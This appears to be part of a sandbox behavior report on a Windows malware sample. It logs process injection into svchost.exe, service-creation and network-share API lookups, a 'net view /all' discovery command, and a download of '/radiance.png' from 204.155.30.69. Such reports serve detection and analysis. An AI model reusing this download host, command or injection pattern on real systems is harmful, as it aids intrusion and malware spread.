| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 8 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x350000, size = 128 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x370000, size = 44 |
|
1 |
Host Behavior
File (2)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | fdata.dat | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Write | fdata.dat | size = 446464 |
|
1 |
Module (44)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | ADVAPI32.dll | base_address = 0x774c0000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76b10000 |
|
1 | |
| Load | MPR.DLL | base_address = 0x71e30000 |
|
1 | |
| Load | ntdll.dll | base_address = 0x77330000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c00000 |
|
1 | |
| Load | WINHTTP.dll | base_address = 0x719a0000 |
|
1 | |
| Get Handle | c:\windows\system32\svchost.exe | base_address = 0x600000 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CloseServiceHandle, address_out = 0x774d369c |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CreateServiceW, address_out = 0x774e712c |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = OpenSCManagerW, address_out = 0x774cca64 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = StartServiceW, address_out = 0x774c7974 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x76b5ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileW, address_out = 0x76b467c3 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileW, address_out = 0x76b5cc56 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThread, address_out = 0x76b6375d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileW, address_out = 0x76b50f62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x76b503ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x76b5bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleA, address_out = 0x76b5cf41 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapAlloc, address_out = 0x77382dd6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapCreate, address_out = 0x76b63ea2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapFree, address_out = 0x76b5bbd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapReAlloc, address_out = 0x7739ff51 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Sleep, address_out = 0x76b5ba46 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WideCharToMultiByte, address_out = 0x76b6450e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76b61400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpW, address_out = 0x76b667b0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrlenW, address_out = 0x76b5d9e8 |
|
1 | |
| Get Address | c:\windows\system32\mpr.dll | function = WNetAddConnection2W, address_out = 0x71e34744 |
|
1 | |
| Get Address | c:\windows\system32\mpr.dll | function = WNetCancelConnection2W, address_out = 0x71e38cd1 |
|
1 | |
| Get Address | c:\windows\system32\mpr.dll | function = WNetCloseEnum, address_out = 0x71e32dd6 |
|
1 | |
| Get Address | c:\windows\system32\mpr.dll | function = WNetEnumResourceW, address_out = 0x71e33058 |
|
1 | |
| Get Address | c:\windows\system32\mpr.dll | function = WNetOpenEnumW, address_out = 0x71e32f06 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = _vsnwprintf, address_out = 0x7739caaa |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x76c13f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x76c2426d |
|
1 | |
| Get Address | c:\windows\system32\winhttp.dll | function = WinHttpCloseHandle, address_out = 0x719a2c01 |
|
1 | |
| Get Address | c:\windows\system32\winhttp.dll | function = WinHttpConnect, address_out = 0x719ad9f5 |
|
1 | |
| Get Address | c:\windows\system32\winhttp.dll | function = WinHttpOpen, address_out = 0x719a58b9 |
|
1 | |
| Get Address | c:\windows\system32\winhttp.dll | function = WinHttpOpenRequest, address_out = 0x719a4aea |
|
1 | |
| Get Address | c:\windows\system32\winhttp.dll | function = WinHttpQueryDataAvailable, address_out = 0x719bc5dd |
|
1 | |
| Get Address | c:\windows\system32\winhttp.dll | function = WinHttpReadData, address_out = 0x719acb9e |
|
1 | |
| Get Address | c:\windows\system32\winhttp.dll | function = WinHttpReceiveResponse, address_out = 0x719ab262 |
|
1 | |
| Get Address | c:\windows\system32\winhttp.dll | function = WinHttpSendRequest, address_out = 0x719a79bd |
|
1 |
System (201)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 1 milliseconds (0.001 seconds) |
|
200 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 |
Network Behavior
TCP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 0 bytes |
| Total Data Received | 0 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 204.155.30.69 |
TCP Session #1
| Information | Value |
|---|---|
| Remote Address | 204.155.30.69 |
| Remote Port | 0 |
| Local Address | 192.168.0.251 |
| Local Port | - |
| Data Sent | 0 bytes |
| Data Received | 0 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 204.155.30.69, server_port = 0 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /radiance.png, accept_types = 0 |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 204.155.30.69/radiance.png |
|
1 | |
| Read Response | size = 3816, size_out = 3816 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 808, size_out = 808 |
|
1 | |
| Read Response | size = 3752, size_out = 3752 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
3 | |
| Read Response | size = 712, size_out = 712 |
|
1 | |
| Read Response | size = 3752, size_out = 3752 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
4 | |
| Read Response | size = 7040, size_out = 7040 |
|
1 | |
| Read Response | size = 7260, size_out = 7260 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 520, size_out = 520 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
8 | |
| Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
8 | |
| Read Response | size = 36, size_out = 36 |
|
1 | |
| Read Response | size = 7260, size_out = 7260 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
5 | |
| Read Response | size = 5504, size_out = 5504 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 7780, size_out = 7780 |
|
1 | |
| Read Response | size = 5808, size_out = 5808 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 3424, size_out = 3424 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
15 | |
| Read Response | size = 1992, size_out = 1992 |
|
1 | |
| Read Response | size = 952, size_out = 952 |
|
1 |
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 0 bytes |
| Total Data Received | 0 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 204.155.30.69 |
HTTP Session #1
| Information | Value |
|---|---|
| Server Name | 204.155.30.69 |
| Server Port | 0 |
| Username | - |
| Password | - |
| Data Sent | 0 bytes |
| Data Received | 0 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 204.155.30.69, server_port = 0 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /radiance.png, accept_types = 0 |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 204.155.30.69/radiance.png |
|
1 | |
| Read Response | size = 3816, size_out = 3816 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 808, size_out = 808 |
|
1 | |
| Read Response | size = 3752, size_out = 3752 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
3 | |
| Read Response | size = 712, size_out = 712 |
|
1 | |
| Read Response | size = 3752, size_out = 3752 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
4 | |
| Read Response | size = 7040, size_out = 7040 |
|
1 | |
| Read Response | size = 7260, size_out = 7260 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 520, size_out = 520 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
8 | |
| Read Response | size = 1024, size_out = 1024 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
8 | |
| Read Response | size = 36, size_out = 36 |
|
1 | |
| Read Response | size = 7260, size_out = 7260 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
5 | |
| Read Response | size = 5504, size_out = 5504 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 7780, size_out = 7780 |
|
1 | |
| Read Response | size = 5808, size_out = 5808 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 3424, size_out = 3424 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
15 | |
| Read Response | size = 1992, size_out = 1992 |
|
1 | |
| Read Response | size = 952, size_out = 952 |
|
1 |
Process #51: cmd.exe
58
0
| Information | Value |
|---|---|
| ID | #51 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | /c net view /all |
| Initial Working Directory | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\ |
| Monitor | Start Time: 00:03:59, Reason: Child Process |
| Unmonitor | End Time: 00:04:16, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:17 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbb4 |
| Parent PID | 0xa70 (c:\windows\system32\svchost.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BB8
|
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 136, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\net.exe | os_pid = 0x950, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49df0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76b624c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x76b4ac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76b53ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76b62732 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-05-14 15:34:04 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 11083028 |
|
1 | |
| Get Time | type = Performance Ctr, time = 31304586788 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000002 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #53: svchost.exe
98
0
| Information | Value |
|---|---|
| ID | #53 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | svchost.exe |
| Initial Working Directory | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\ |
| Monitor | Start Time: 00:03:59, Reason: Child Process |
| Unmonitor | End Time: 00:04:16, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:17 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x748 |
| Parent PID | 0x214 (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
E20
0x
E28
0x
E2C
|
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x50000, size = 367 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x60000, size = 112 |
|
59 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x602104, size = 12 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd40000, size = 1024 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd41000, size = 35840 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4a000, size = 6656 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4c000, size = 3072 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4d000, size = 4084 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4e000, size = 512 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f000, size = 3072 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd50000, size = 512 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd51000, size = 512 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd52000, size = 1536 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 26 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x120000, size = 12 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 14 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x120000, size = 16 |
|
55 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f224, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 13 |
|
6 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f22c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 22 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f230, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 21 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f234, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 18 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f238, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 20 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f23c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 19 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f240, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 24 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f244, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f248, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 17 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f24c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f250, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 15 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f254, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f258, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f25c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f260, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 10 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f264, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 9 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f268, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 12 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f26c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f270, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f274, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f278, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f27c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f280, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f284, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 28 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f288, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 6 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f28c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f290, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f294, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 25 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f298, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f29c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2a0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2a4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2ac, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2b0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 11 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2b4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 7 |
|
9 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2b8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2bc, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 5 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2c0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x6cd4f2c4, size = 4 |
|
1 | |
